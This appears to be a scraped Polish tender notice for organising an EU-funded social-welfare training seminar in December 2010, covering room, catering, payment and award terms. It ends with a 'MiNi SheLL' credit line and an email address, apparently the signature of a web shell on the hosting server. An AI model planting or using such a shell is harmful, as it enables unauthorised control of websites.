d)przygotowanie punktu rejestracji uczestników Seminarium od godziny 8.00 do 16.00, 
e)zapewnienie Sali seminaryjnej na minimum 50 osób z niezbędnym wyposażeniem 
f) Zapewnienie uczestnikom w czasie trwania seminarium 2 przerw kawowych uzupełnianych oraz lunch w formie szwedzkiego stołu dla każdego uczestnika. Propozycję menu Wykonawca winien dołączyć do oferty.
 Przygotowanie pierwszej  i drugiej przerwy kawowej uzupełnianej dla uczestników seminariów obejmuje:
1) Kawę czarną z ekspresu w filiżankach po jednej na osobę, 
2) Herbatę czarną tradycyjną w filiżankach po jednej na osobę,
3) Ciastka/herbatniki  - min. 50 gram na osobę,
4) Woda mineralna gazowana, niegazowana, soki (2 rodzaje) - 0,25l na osobę, soki 2 rodzaje po 0,25 ml na osobę
5) Cukier, śmietanka do kawy, cytryna do herbaty dla wszystkich uczestników.
 Lunch dla uczestników seminarium zamykającego w formie szwedzkiego stołu obejmuje:
1) Kawę czarną z ekspresu w filiżankach po jednej na osobę,
2) Herbatę czarną tradycyjną w filiżankach  po jednej na osobę,
3) Woda mineralna gazowana, niegazowana, soki - 0,25l na osobę, soki 2 rodzaje po 0,25ml na osobę
4) Cukier, śmietanka do kawy, cytryna do herbaty dla wszystkich uczestników
5) Danie główne - 3 rodzaje dań, w tym jedno jarskie, 3 rodzaje sałatek obiadowych dla każdego z uczestników, łącznie 50 posiłków. 
d) Udostępnienie uczestnikom projektu odpowiedniego sprzętu i warunków lokalowych, gwarantujących wysoki poziom usługi, w tym sala seminaryjna na minimum 50 osób wyposażona w projektor multimedialny, ekran, laptop nagłośnienie - dostępną dla uczestników projektu w godz. od 08.00 do 16.00.
Projekt Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
 W sali, w której będzie odbywać się Seminarium musi być zawieszony plakat projektu
Projekt systemowy DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Plakaty dostarczy Zamawiający.
 Zamówienie należy wykonać w terminie - między 14.12.2010r. a  21.12.2010r. - dni robocze.
Cena usługi musi zawierać całkowity koszt przedmiotu zamówienia (organizacje seminarium, wyżywienie, sala, wyposażenie, itp.). Warunkiem zapłaty za usługę będzie spełnienie wszystkich warunków umowy.
 Płatność za usługę będzie dokonywana po zakończeniu seminarium w terminie do 30 dni po odebraniu faktury/rachunku przez Zamawiającego.
3.8 Wykonawca na fakturze/rachunku przedstawia całkowitą kwotę za zrealizowaną seminarium zgodnie z zawartą umową i preliminarzem kosztów.
 Wykonawca załączy do swej oferty szczegółowy opis przedmiotu zamówienia na który złoży swoją ofertę. W opisie tym winny się znaleźć:
- zaproponowane terminy realizacji zamówienia zgodnie z określonymi w załączniku nr 5 do SIWZ.
- miejsce realizacji zamówienia z szczegółowym opisem Sali konferencyjnej, jej wyposażenia,
Wymagany opis, po podpisaniu umowy stanie się jej integralną częścią jako załącznik nr 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.10.00-5, 55.30.00.00-3, 70.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com